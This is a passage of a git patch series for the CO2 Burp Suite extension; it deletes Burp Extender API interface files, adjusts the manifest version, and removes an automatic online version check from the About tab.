to obtain the content type of the message body. - * - * @return An indication of the content type of the message body. Available - * types are defined within this interface. - */ - byte getContentType(); -} diff --git a/src/burp/IResponseInfo.java b/src/burp/IResponseInfo.java deleted file mode 100644 index 8435f0a..0000000 --- a/src/burp/IResponseInfo.java +++ /dev/null @@ -1,73 +0,0 @@ -package burp; - -/* - * @(#)IResponseInfo.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.util.List; - -/** - * This interface is used to retrieve key details about an HTTP response. - * Extensions can obtain an - * IResponseInfo object for a given response by calling - * IExtensionHelpers.analyzeResponse(). - */ -public interface IResponseInfo -{ - /** - * This method is used to obtain the HTTP headers contained in the response. - * - * @return The HTTP headers contained in the response. - */ - List getHeaders(); - - /** - * This method is used to obtain the offset within the response where the - * message body begins. - * - * @return The offset within the response where the message body begins. - */ - int getBodyOffset(); - - /** - * This method is used to obtain the HTTP status code contained in the - * response. - * - * @return The HTTP status code contained in the response. - */ - short getStatusCode(); - - /** - * This method is used to obtain details of the HTTP cookies set in the - * response. - * - * @return A list of ICookie objects representing the cookies - * set in the response, if any. - */ - List getCookies(); - - /** - * This method is used to obtain the MIME type of the response, as stated in - * the HTTP headers. - * - * @return A textual label for the stated MIME type, or an empty String if - * this is not known or recognized. The possible labels are the same as - * those used in the main Burp UI. - */ - String getStatedMimeType(); - - /** - * This method is used to obtain the MIME type of the response, as inferred - * from the contents of the HTTP message body. - * - * @return A textual label for the inferred MIME type, or an empty String if - * this is not known or recognized. The possible labels are the same as - * those used in the main Burp UI. - */ - String getInferredMimeType(); -} diff --git a/src/burp/IScanIssue.java b/src/burp/IScanIssue.java deleted file mode 100644 index 532e8b9..0000000 --- a/src/burp/IScanIssue.java +++ /dev/null @@ -1,120 +0,0 @@ -package burp; - -/* - * @(#)IScanIssue.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used to retrieve details of Scanner issues. Extensions can - * obtain details of issues by registering an - * IScannerListener or by calling - * IBurpExtenderCallbacks.getScanIssues(). Extensions can also add - * custom Scanner issues by registering an - * IScannerCheck or calling - * IBurpExtenderCallbacks.addScanIssue(), and providing their own - * implementations of this interface - */ -public interface IScanIssue -{ - /** - * This method returns the URL for which the issue was generated. - * - * @return The URL for which the issue was generated. - */ - java.net.URL getUrl(); - - /** - * This method returns the name of the issue type. - * - * @return The name of the issue type (e.g. "SQL injection"). - */ - String getIssueName(); - - /** - * This method returns a numeric identifier of the issue type. See the Burp - * Scanner help documentation for a listing of all the issue types. - * - * @return A numeric identifier of the issue type. - */ - int getIssueType(); - - /** - * This method returns the issue severity level. - * - * @return The issue severity level. Expected values are "High", "Medium", - * "Low", "Information" or "False positive". - * - */ - String getSeverity(); - - /** - * This method returns the issue confidence level. - * - * @return The issue confidence level. Expected values are "Certain", "Firm" - * or "Tentative". - */ - String getConfidence(); - - /** - * This method returns a background description for this type of issue. - * - * @return A background description for this type of issue, or - * null if none applies. - */ - String getIssueBackground(); - - /** - * This method returns a background description of the remediation for this - * type of issue. - * - * @return A background description of the remediation for this type of - * issue, or - * null if none applies. - */ - String getRemediationBackground(); - - /** - * This method returns detailed information about this specific instance of - * the issue. - * - * @return Detailed information about this specific instance of the issue, - * or - * null if none applies. - */ - String getIssueDetail(); - - /** - * This method returns detailed information about the remediation for this - * specific instance of the issue. - * - * @return Detailed information about the remediation for this specific - * instance of the issue, or - * null if none applies. - */ - String getRemediationDetail(); - - /** - * This method returns the HTTP messages on the basis of which the issue was - * generated. - * - * @return The HTTP messages on the basis of which the issue was generated. - * Note: The items in this array should be instances of - * IHttpRequestResponseWithMarkers if applicable, so that - * details of the relevant portions of the request and response messages are - * available. - */ - IHttpRequestResponse[] getHttpMessages(); - - /** - * This method returns the HTTP service for which the issue was generated. - * - * @return The HTTP service for which the issue was generated. - */ - IHttpService getHttpService(); - -} diff --git a/src/burp/IScanQueueItem.java b/src/burp/IScanQueueItem.java deleted file mode 100644 index 1716854..0000000 --- a/src/burp/IScanQueueItem.java +++ /dev/null @@ -1,80 +0,0 @@ -package burp; - -/* - * @(#)IScanQueueItem.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used to retrieve details of items in the Burp Scanner - * active scan queue. Extensions can obtain references to scan queue items by - * calling - * IBurpExtenderCallbacks.doActiveScan(). - */ -public interface IScanQueueItem -{ - /** - * This method returns a description of the status of the scan queue item. - * - * @return A description of the status of the scan queue item. - */ - String getStatus(); - - /** - * This method returns an indication of the percentage completed for the - * scan queue item. - * - * @return An indication of the percentage completed for the scan queue - * item. - */ - byte getPercentageComplete(); - - /** - * This method returns the number of requests that have been made for the - * scan queue item. - * - * @return The number of requests that have been made for the scan queue - * item. - */ - int getNumRequests(); - - /** - * This method returns the number of network errors that have occurred for - * the scan queue item. - * - * @return The number of network errors that have occurred for the scan - * queue item. - */ - int getNumErrors(); - - /** - * This method returns the number of attack insertion points being used for - * the scan queue item. - * - * @return The number of attack insertion points being used for the scan - * queue item. - */ - int getNumInsertionPoints(); - - /** - * This method allows the scan queue item to be canceled. - */ - void cancel(); - - /** - * This method returns details of the issues generated for the scan queue - * item. Note: different items within the scan queue may contain - * duplicated versions of the same issues - for example, if the same request - * has been scanned multiple times. Duplicated issues are consolidated in - * the main view of scan results. Extensions can register an - * IScannerListener to get details only of unique, newly - * discovered Scanner issues post-consolidation. - * - * @return Details of the issues generated for the scan queue item. - */ - IScanIssue[] getIssues(); -} diff --git a/src/burp/IScannerCheck.java b/src/burp/IScannerCheck.java deleted file mode 100644 index 615bad2..0000000 --- a/src/burp/IScannerCheck.java +++ /dev/null @@ -1,83 +0,0 @@ -package burp; - -/* - * @(#)IScannerCheck.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.util.List; - -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerScannerCheck() to register a - * custom Scanner check. When performing scanning, Burp will ask the check to - * perform active or passive scanning on the base request, and report any - * Scanner issues that are identified. - */ -public interface IScannerCheck -{ - - /** - * The Scanner invokes this method for each base request / response that is - * passively scanned. Note: Extensions should not only analyze the - * HTTP messages provided during passive scanning, and should not make any - * new HTTP requests of their own. - * - * @param baseRequestResponse The base HTTP request / response that should - * be passively scanned. - * @return A list of IScanIssue objects, or null - * if no issues are identified. - */ - List doPassiveScan(IHttpRequestResponse baseRequestResponse); - - /** - * The Scanner invokes this method for each insertion point that is actively - * scanned. Extensions may issue HTTP requests as required to carry out - * active scanning, and should use the - * IScannerInsertionPoint object provided to build scan - * requests for particular payloads. - * Note: - * Scan checks should submit raw non-encoded payloads to insertion points, - * and the insertion point has responsibility for performing any data - * encoding that is necessary given the nature and location of the insertion - * point. - * - * @param baseRequestResponse The base HTTP request / response that should - * be actively scanned. - * @param insertionPoint An IScannerInsertionPoint object that - * can be queried to obtain details of the insertion point being tested, and - * can be used to build scan requests for particular payloads. - * @return A list of IScanIssue objects, or null - * if no issues are identified. - */ - List doActiveScan( - IHttpRequestResponse baseRequestResponse, - IScannerInsertionPoint insertionPoint); - - /** - * The Scanner invokes this method when the custom Scanner check has - * reported multiple issues for the same URL path. This can arise either - * because there are multiple distinct vulnerabilities, or because the same - * (or a similar) request has been scanned more than once. The custom check - * should determine whether the issues are duplicates. In most cases, where - * a check uses distinct issue names or descriptions for distinct issues, - * the consolidation process will simply be a matter of comparing these - * features for the two issues. - * - * @param existingIssue An issue that was previously reported by this - * Scanner check. - * @param newIssue An issue at the same URL path that has been newly - * reported by this Scanner check. - * @return An indication of which issue(s) should be reported in the main - * Scanner results. The method should return -1 to report the - * existing issue only, 0 to report both issues, and - * 1 to report the new issue only. - */ - int consolidateDuplicateIssues( - IScanIssue existingIssue, - IScanIssue newIssue); -} diff --git a/src/burp/IScannerInsertionPoint.java b/src/burp/IScannerInsertionPoint.java deleted file mode 100644 index 2969d24..0000000 --- a/src/burp/IScannerInsertionPoint.java +++ /dev/null @@ -1,159 +0,0 @@ -package burp; - -/* - * @(#)IScannerInsertionPoint.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used to define an insertion point for use by active Scanner - * checks. Extensions can obtain instances of this interface by registering an - * IScannerCheck, or can create instances for use by Burp's own - * scan checks by registering an - * IScannerInsertionPointProvider. - */ -public interface IScannerInsertionPoint -{ - - /** - * Used to indicate where the payload is inserted into the value of a URL - * parameter. - */ - static final byte INS_PARAM_URL = 0x00; - /** - * Used to indicate where the payload is inserted into the value of a body - * parameter. - */ - static final byte INS_PARAM_BODY = 0x01; - /** - * Used to indicate where the payload is inserted into the value of an HTTP - * cookie. - */ - static final byte INS_PARAM_COOKIE = 0x02; - /** - * Used to indicate where the payload is inserted into the value of an item - * of data within an XML data structure. - */ - static final byte INS_PARAM_XML = 0x03; - /** - * Used to indicate where the payload is inserted into the value of a tag - * attribute within an XML structure. - */ - static final byte INS_PARAM_XML_ATTR = 0x04; - /** - * Used to indicate where the payload is inserted into the value of a - * parameter attribute within a multi-part message body (such as the name of - * an uploaded file). - */ - static final byte INS_PARAM_MULTIPART_ATTR = 0x05; - /** - * Used to indicate where the payload is inserted into the value of an item - * of data within a JSON structure. - */ - static final byte INS_PARAM_JSON = 0x06; - /** - * Used to indicate where the payload is inserted into the value of an AMF - * parameter. - */ - static final byte INS_PARAM_AMF = 0x07; - /** - * Used to indicate where the payload is inserted into the value of an HTTP - * request header. - */ - static final byte INS_HEADER = 0x20; - /** - * Used to indicate where the payload is inserted into a REST parameter - * within the URL file path. - */ - static final byte INS_URL_REST = 0x21; - /** - * Used to indicate where the payload is inserted into the name of an added - * URL parameter. - */ - static final byte INS_PARAM_NAME_URL = 0x22; - /** - * Used to indicate where the payload is inserted into the name of an added - * body parameter. - */ - static final byte INS_PARAM_NAME_BODY = 0x23; - /** - * Used to indicate where the payload is inserted at a location manually - * configured by the user. - */ - static final byte INS_USER_PROVIDED = 0x40; - /** - * Used to indicate where the insertion point is provided by an - * extension-registered - * IScannerInsertionPointProvider. - */ - static final byte INS_EXTENSION_PROVIDED = 0x41; - /** - * Used to indicate where the payload is inserted at an unknown location - * within the request. - */ - static final byte INS_UNKNOWN = 0x7f; - - /** - * This method returns the name of the insertion point. - * - * @return The name of the insertion point (for example, a description of a - * particular request parameter). - */ - String getInsertionPointName(); - - /** - * This method returns the base value for this insertion point. - * - * @return the base value that appears in this insertion point in the base - * request being scanned, or null if there is no value in the - * base request that corresponds to this insertion point. - */ - String getBaseValue(); - - /** - * This method is used to build a request with the specified payload placed - * into the insertion point. There is no requirement for extension-provided - * insertion points to adjust the Content-Length header in requests if the - * body length has changed, although Burp-provided insertion points will - * always do this and will return a request with a valid Content-Length - * header. - * Note: - * Scan checks should submit raw non-encoded payloads to insertion points, - * and the insertion point has responsibility for performing any data - * encoding that is necessary given the nature and location of the insertion - * point. - * - * @param payload The payload that should be placed into the insertion - * point. - * @return The resulting request. - */ - byte[] buildRequest(byte[] payload); - - /** - * This method is used to determine the offsets of the payload value within - * the request, when it is placed into the insertion point. Scan checks may - * invoke this method when reporting issues, so as to highlight the relevant - * part of the request within the UI. - * - * @param payload The payload that should be placed into the insertion - * point. - * @return An int[2] array containing the start and end offsets of the - * payload within the request, or null if this is not applicable (for - * example, where the insertion point places a payload into a serialized - * data structure, the raw payload may not literally appear anywhere within - * the resulting request). - */ - int[] getPayloadOffsets(byte[] payload); - - /** - * This method returns the type of the insertion point. - * - * @return The type of the insertion point. Available types are defined in - * this interface. - */ - byte getInsertionPointType(); -} diff --git a/src/burp/IScannerInsertionPointProvider.java b/src/burp/IScannerInsertionPointProvider.java deleted file mode 100644 index a186530..0000000 --- a/src/burp/IScannerInsertionPointProvider.java +++ /dev/null @@ -1,38 +0,0 @@ -package burp; - -/* - * @(#)IScannerInsertionPointProvider.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.util.List; - -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerScannerInsertionPointProvider() - * to register a factory for custom Scanner insertion points. - */ -public interface IScannerInsertionPointProvider -{ - /** - * When a request is actively scanned, the Scanner will invoke this method, - * and the provider should provide a list of custom insertion points that - * will be used in the scan. Note: these insertion points are used in - * addition to those that are derived from Burp Scanner's configuration, and - * those provided by any other Burp extensions. - * - * @param baseRequestResponse The base request that will be actively - * scanned. - * @return A list of - * IScannerInsertionPoint objects that should be used in the - * scanning, or - * null if no custom insertion points are applicable for this - * request. - */ - List getInsertionPoints( - IHttpRequestResponse baseRequestResponse); -} diff --git a/src/burp/IScannerListener.java b/src/burp/IScannerListener.java deleted file mode 100644 index 85e7cbb..0000000 --- a/src/burp/IScannerListener.java +++ /dev/null @@ -1,30 +0,0 @@ -package burp; - -/* - * @(#)IScannerListener.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerScannerListener() to register a - * Scanner listener. The listener will be notified of new issues that are - * reported by the Scanner tool. Extensions can perform custom analysis or - * logging of Scanner issues by registering a Scanner listener. - */ -public interface IScannerListener -{ - /** - * This method is invoked when a new issue is added to Burp Scanner's - * results. - * - * @param issue An - * IScanIssue object that the extension can query to obtain - * details about the new issue. - */ - void newScanIssue(IScanIssue issue); -} diff --git a/src/burp/IScopeChangeListener.java b/src/burp/IScopeChangeListener.java deleted file mode 100644 index 3ea929a..0000000 --- a/src/burp/IScopeChangeListener.java +++ /dev/null @@ -1,25 +0,0 @@ -package burp; - -/* - * @(#)IScopeChangeListener.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerScopeChangeListener() to register - * a scope change listener. The listener will be notified whenever a change - * occurs to Burp's suite-wide target scope. - */ -public interface IScopeChangeListener -{ - /** - * This method is invoked whenever a change occurs to Burp's suite-wide - * target scope. - */ - void scopeChanged(); -} diff --git a/src/burp/ISessionHandlingAction.java b/src/burp/ISessionHandlingAction.java deleted file mode 100644 index 3915332..0000000 --- a/src/burp/ISessionHandlingAction.java +++ /dev/null @@ -1,51 +0,0 @@ -package burp; - -/* - * @(#)ISessionHandlingAction.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * Extensions can implement this interface and then call - * IBurpExtenderCallbacks.registerSessionHandlingAction() to - * register a custom session handling action. Each registered action will be - * available within the session handling rule UI for the user to select as a - * rule action. Users can choose to invoke an action directly in its own right, - * or following execution of a macro. - */ -public interface ISessionHandlingAction -{ - /** - * This method is used by Burp to obtain the name of the session handling - * action. This will be displayed as an option within the session handling - * rule editor when the user selects to execute an extension-provided - * action. - * - * @return The name of the action. - */ - String getActionName(); - - /** - * This method is invoked when the session handling action should be - * executed. This may happen as an action in its own right, or as a - * sub-action following execution of a macro. - * - * @param currentRequest The base request that is currently being processed. - * The action can query this object to obtain details about the base - * request. It can issue additional requests of its own if necessary, and - * can use the setter methods on this object to update the base request. - * @param macroItems If the action is invoked following execution of a - * macro, this parameter contains the result of executing the macro. - * Otherwise, it is - * null. Actions can use the details of the macro items to - * perform custom analysis of the macro to derive values of non-standard - * session handling tokens, etc. - */ - void performAction( - IHttpRequestResponse currentRequest, - IHttpRequestResponse[] macroItems); -} diff --git a/src/burp/ITab.java b/src/burp/ITab.java deleted file mode 100644 index 5a00017..0000000 --- a/src/burp/ITab.java +++ /dev/null @@ -1,38 +0,0 @@ -package burp; - -/* - * @(#)ITab.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.awt.Component; - -/** - * This interface is used to provide Burp with details of a custom tab that will - * be added to Burp's UI, using a method such as - * IBurpExtenderCallbacks.addSuiteTab(). - */ -public interface ITab -{ - /** - * Burp uses this method to obtain the caption that should appear on the - * custom tab when it is displayed. - * - * @return The caption that should appear on the custom tab when it is - * displayed. - */ - String getTabCaption(); - - /** - * Burp uses this method to obtain the component that should be used as the - * contents of the custom tab when it is displayed. - * - * @return The component that should be used as the contents of the custom - * tab when it is displayed. - */ - Component getUiComponent(); -} diff --git a/src/burp/ITempFile.java b/src/burp/ITempFile.java deleted file mode 100644 index 9e3e83d..0000000 --- a/src/burp/ITempFile.java +++ /dev/null @@ -1,33 +0,0 @@ -package burp; - -/* - * @(#)ITempFile.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -/** - * This interface is used to hold details of a temporary file that has been - * created via a call to - * IBurpExtenderCallbacks.saveToTempFile(). - * - */ -public interface ITempFile -{ - /** - * This method is used to retrieve the contents of the buffer that was saved - * in the temporary file. - * - * @return The contents of the buffer that was saved in the temporary file. - */ - byte[] getBuffer(); - - /** - * This method is used to permanently delete the temporary file when it is - * no longer required. - */ - void delete(); -} diff --git a/src/burp/ITextEditor.java b/src/burp/ITextEditor.java deleted file mode 100644 index 5b23c84..0000000 --- a/src/burp/ITextEditor.java +++ /dev/null @@ -1,90 +0,0 @@ -package burp; - -/* - * @(#)ITextEditor.java - * - * Copyright PortSwigger Ltd. All rights reserved. - * - * This code may be used to extend the functionality of Burp Suite Free Edition - * and Burp Suite Professional, provided that this usage does not violate the - * license terms for those products. - */ -import java.awt.Component; - -/** - * This interface is used to provide extensions with an instance of Burp's raw - * text editor, for the extension to use in its own UI. Extensions should call - * IBurpExtenderCallbacks.createTextEditor() to obtain an instance - * of this interface. - */ -public interface ITextEditor -{ - /** - * This method returns the UI component of the editor, for extensions to add - * to their own UI. - * - * @return The UI component of the editor. - */ - Component getComponent(); - - /** - * This method is used to control whether the editor is currently editable. - * This status can be toggled on and off as required. - * - * @param editable Indicates whether the editor should be currently - * editable. - */ - void setEditable(boolean editable); - - /** - * This method is used to update the currently displayed text in the editor. - * - * @param text The text to be displayed. - */ - void setText(byte[] text); - - /** - * This method is used to retrieve the currently displayed text. - * - * @return The currently displayed text. - */ - byte[] getText(); - - /** - * This method is used to determine whether the user has modified the - * contents of the editor. - * - * @return An indication of whether the user has modified the contents of - * the editor since the last call to - * setText(). - */ - boolean isTextModified(); - - /** - * This method is used to obtain the currently selected text. - * - * @return The currently selected text, or - * null if the user has not made any selection. - */ - byte[] getSelectedText(); - - /** - * This method can be used to retrieve the bounds of the user's selection - * into the displayed text, if applicable. - * - * @return An int[2] array containing the start and end offsets of the - * user's selection within the displayed text. If the user has not made any - * selection in the current message, both offsets indicate the position of - * the caret within the editor. - */ - int[] getSelectionBounds(); - - /** - * This method is used to update the search expression that is shown in the - * search bar below the editor. The editor will automatically highlight any - * regions of the displayed text that match the search expression. - * - * @param expression The search expression. - */ - void setSearchExpression(String expression); -} From 9547d30bcb9714a002f1fbee3341bfd5555cef86 Mon Sep 17 00:00:00 2001 From: jgillam Date: Sat, 17 Feb 2024 14:15:43 -0500 Subject: [PATCH 3/8] rev'd to version 1.2.0, serialVersion 10 --- BappManifest.bmf | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/BappManifest.bmf b/BappManifest.bmf index da32cbb..741465a 100644 --- a/BappManifest.bmf +++ b/BappManifest.bmf @@ -2,11 +2,11 @@ Uuid: c5071c7a7e004f72ae485e8a72911afc ExtensionType: 1 Name: CO2 RepoName: co2 -ScreenVersion: 1.1.13 -SerialVersion: 9 +ScreenVersion: 1.2.0 +SerialVersion: 10 MinPlatformVersion: 0 ProOnly: False Author: Jason Gillam ShortDescription: Adds various capabilities including SQL Mapper, User Generator and Prettier JS. -EntryPoint: build/libs/co2-all.jar -BuildCommand: gradle fatJar +EntryPoint: dist/co2-suite.jar +BuildCommand: gradlew fatJar From ab6d5ccaca6f0cf40a3b9d834367f83e0a5c91a9 Mon Sep 17 00:00:00 2001 From: jgillam Date: Sat, 17 Feb 2024 15:09:42 -0500 Subject: [PATCH 4/8] updates to about tab to remove automated version checks --- modules/co2-suite/release_notes.txt | 3 + .../src/com/professionallyevil/co2/About.java | 6 +- .../com/professionallyevil/co2/AboutTab.form | 5 +- .../com/professionallyevil/co2/AboutTab.java | 111 ++---------------- 4 files changed, 23 insertions(+), 102 deletions(-) diff --git a/modules/co2-suite/release_notes.txt b/modules/co2-suite/release_notes.txt index 87cb732..5f84a28 100644 --- a/modules/co2-suite/release_notes.txt +++ b/modules/co2-suite/release_notes.txt @@ -1,5 +1,8 @@ = Burp CO2 Release Notes = +==Version 1.2.0 (17 Feb, 2024):== + * Removed laudanum module to prevent flagging as malware by some AV vendors + ==Version 1.1.10 (4 June, 2016):== * Moved the cookies in sqlmapper to the end of the line to work around issue where cookie characters sometimes break the input into sqlmap. diff --git a/modules/co2-suite/src/com/professionallyevil/co2/About.java b/modules/co2-suite/src/com/professionallyevil/co2/About.java index 32f2001..d2a6c92 100644 --- a/modules/co2-suite/src/com/professionallyevil/co2/About.java +++ b/modules/co2-suite/src/com/professionallyevil/co2/About.java @@ -34,9 +34,9 @@ public class About implements Co2Configurable { Version currentVersion; public About(IBurpExtenderCallbacks callbacks) { - build = loadBuild(); - currentVersion = new Version(Co2SuiteExtender.VERSION, build); - tab = new AboutTab(callbacks, currentVersion, build); + //build = loadBuild(); + currentVersion = new Version(Co2SuiteExtender.VERSION, "latest"); + tab = new AboutTab(callbacks, currentVersion, "latest"); ; } diff --git a/modules/co2-suite/src/com/professionallyevil/co2/AboutTab.form b/modules/co2-suite/src/com/professionallyevil/co2/AboutTab.form index bdf28a3..d7d9720 100644 --- a/modules/co2-suite/src/com/professionallyevil/co2/AboutTab.form +++ b/modules/co2-suite/src/com/professionallyevil/co2/AboutTab.form @@ -53,6 +53,7 @@ + @@ -84,6 +85,7 @@ + @@ -196,8 +198,9 @@ + - + diff --git a/modules/co2-suite/src/com/professionallyevil/co2/AboutTab.java b/modules/co2-suite/src/com/professionallyevil/co2/AboutTab.java index 9cf654f..9e8574d 100644 --- a/modules/co2-suite/src/com/professionallyevil/co2/AboutTab.java +++ b/modules/co2-suite/src/com/professionallyevil/co2/AboutTab.java @@ -53,7 +53,7 @@ public class AboutTab { private IBurpExtenderCallbacks callbacks; private static String SETTING_LAST_UPDATE_DATE = "co2.about.lastupdate.date"; private static String SETTING_UPDATE_CHECK_AUTO = "co2.about.lastupdate.auto"; - private static String VERSION_URI = "http://burpco2.com/latestversions.txt"; + // private static String VERSION_URI = "http://burpco2.com/latestversions.txt"; private DateFormat dateFormat = DateFormat.getDateTimeInstance(DateFormat.MEDIUM, DateFormat.MEDIUM); private Version currentVersion; private boolean autoCheck; @@ -66,7 +66,7 @@ public AboutTab(IBurpExtenderCallbacks burpCallbacks, Version currentVersion, St additionalInfoLink.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { - executeLink("http://burpco2.com/?src=co2"); + executeLink("https://github.com/JGillam/burp-co2"); } }); bugTrackingLink.setCursor(new Cursor(Cursor.HAND_CURSOR)); @@ -83,7 +83,7 @@ public void mouseClicked(MouseEvent e) { } }); } else { - additionalInfoLink.setText("www.burpco2.com"); + additionalInfoLink.setText("CO2 on GitHub"); bugTrackingLink.setText("https://github.com/JGillam/burp-co2/issues"); } buttonCheckForUpdate.addActionListener(new ActionListener() { @@ -92,7 +92,7 @@ public void actionPerformed(ActionEvent e) { versionCheck(false); } }); - setVersionText(currentVersion.toString() + " (build " + build + ")" + (CO2Config.isLoadedFromBappStore(burpCallbacks) ? " from BAppStore." : " from jar file.")); + setVersionText(currentVersion.toString() + (CO2Config.isLoadedFromBappStore(burpCallbacks) ? " from BAppStore." : " from jar file.")); String settingLastUpdateDate = burpCallbacks.loadExtensionSetting(SETTING_LAST_UPDATE_DATE); if (settingLastUpdateDate != null && !settingLastUpdateDate.isEmpty()) { lastCheckedDate.setText(settingLastUpdateDate); @@ -105,14 +105,14 @@ public void actionPerformed(ActionEvent e) { chkAutoCheck.addChangeListener(new ChangeListener() { @Override public void stateChanged(ChangeEvent e) { - if (autoCheck != chkAutoCheck.isSelected()) { - autoCheck = chkAutoCheck.isSelected(); - AboutTab.this.callbacks.saveExtensionSetting(SETTING_UPDATE_CHECK_AUTO, "" + autoCheck); - AboutTab.this.callbacks.printOutput("CO2 automatic version check is now " + (autoCheck ? "on" : "off")); - if (autoCheck) { - versionCheck(true); - } - } +// if (autoCheck != chkAutoCheck.isSelected()) { +// autoCheck = chkAutoCheck.isSelected(); +// AboutTab.this.callbacks.saveExtensionSetting(SETTING_UPDATE_CHECK_AUTO, "" + autoCheck); +// AboutTab.this.callbacks.printOutput("CO2 automatic version check is now " + (autoCheck ? "on" : "off")); +// if (autoCheck) { +// versionCheck(false); +// } +// } } }); } @@ -121,92 +121,7 @@ public void stateChanged(ChangeEvent e) { * Perform a version check. Look up latest version on the Internet and determine if a update is available. */ public void versionCheck(final boolean automatic) { - callbacks.printOutput("CO2 Performing version check. Your version: " + currentVersion.toString()); - latestVersionLabel.setText("Checking..."); - latestStoreVersionLabel.setText("Checking..."); - - SwingWorker worker = new SwingWorker() { - @Override - protected Object doInBackground() throws Exception { - URL url = new URL(VERSION_URI + "?v=" + - currentVersion.getVersionString() + - "&t=" + - (automatic ? "a" : "m") + // reports if automated or manual update - "&b=" + - (CO2Config.isLoadedFromBappStore(AboutTab.this.callbacks) ? "y" : "n") // loaded from a bappstore version? - ); - - byte[] request = callbacks.getHelpers().buildHttpRequest(url); - byte[] response = callbacks.makeHttpRequest("burpco2.com", 80, false, request); - IResponseInfo responseInfo = callbacks.getHelpers().analyzeResponse(response); - if (responseInfo.getStatusCode() == 200) { - String body = new String(response).substring(responseInfo.getBodyOffset()).trim(); - String[] versionText = body.split(","); - Version[] versions = new Version[versionText.length]; - for (int i = 0; i < versions.length; i++) { - versions[i] = new Version(versionText[i]); - } - return versions; - - } else { - return null; - } - } - - @Override - protected void done() { - super.done(); - try { - Version[] latestVersions = (Version[]) get(); - if (latestVersions != null && latestVersions.length == 2) { // don't process if we don't have 2 - String date = dateFormat.format(new Date()); - lastCheckedDate.setText(date); - callbacks.saveExtensionSetting(SETTING_LAST_UPDATE_DATE, date); - boolean isBappStoreVersion = CO2Config.isLoadedFromBappStore(AboutTab.this.callbacks); - if (isBappStoreVersion) { - if (latestVersions[1].isNewerThan(currentVersion)) { - latestStoreVersionLabel.setText("" + latestVersions[1].toString() + ""); - //latestStoreVersionLabel.setCursor(new Cursor(Cursor.HAND_CURSOR)); - callbacks.printOutput("CO2 Version " + latestVersions[1].toString() + " is now available on the BAppStore."); - if (autoCheck) { - callbacks.issueAlert("CO2 Version " + latestVersions[1].toString() + " is now available on the BAppStore. See the CO2 About tab for more info."); - } - } else { - latestStoreVersionLabel.setText(latestVersions[1].toString()); - } - latestVersionLabel.setText(latestVersions[0].toString()); - } else { - if (latestVersions[0].isNewerThan(currentVersion)) { - latestVersionLabel.setText("" + latestVersions[0].toString() + ""); - latestVersionLabel.setCursor(new Cursor(Cursor.HAND_CURSOR)); - callbacks.printOutput("CO2 Version " + latestVersions[0].toString() + " is now available."); - if (autoCheck) { - callbacks.issueAlert("CO2 Version " + latestVersions[0].toString() + " is now available. See the CO2 About tab for more info."); - } - } else { - latestVersionLabel.setText(latestVersions[0].toString()); - latestVersionLabel.setCursor(new Cursor(Cursor.DEFAULT_CURSOR)); - } - latestStoreVersionLabel.setText(latestVersions[1].toString()); - } - } else { - callbacks.printError("Unable to retrieve versions from: " + - VERSION_URI); - callbacks.issueAlert("Unable to retrieve versions from: " + - VERSION_URI); - latestVersionLabel.setText("Unknown"); - latestStoreVersionLabel.setText("Unknown"); - - } - } catch (InterruptedException e) { - e.printStackTrace(); - } catch (ExecutionException e) { - e.printStackTrace(); - } - } - }; - - worker.execute(); + callbacks.printOutput("Version checking has been disabled. Please update with the BAppStore."); callbacks.printOutput("CO2 Performing version check. Your version: " + currentVersion.toString()); } public JPanel getMainPanel() { From d887e684beeb3fdd7101f7cc00b3c709e36d4850 Mon Sep 17 00:00:00 2001 From: jgillam Date: Sat, 17 Feb 2024 15:18:51 -0500 Subject: [PATCH 5/8] Revert "rev'd to version 1.2.0, serialVersion 10" This reverts commit 9547d30bcb9714a002f1fbee3341bfd5555cef86. --- BappManifest.bmf | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/BappManifest.bmf b/BappManifest.bmf index 741465a..da32cbb 100644 --- a/BappManifest.bmf +++ b/BappManifest.bmf @@ -2,11 +2,11 @@ Uuid: c5071c7a7e004f72ae485e8a72911afc ExtensionType: 1 Name: CO2 RepoName: co2 -ScreenVersion: 1.2.0 -SerialVersion: 10 +ScreenVersion: 1.1.13 +SerialVersion: 9 MinPlatformVersion: 0 ProOnly: False Author: Jason Gillam ShortDescription: Adds various 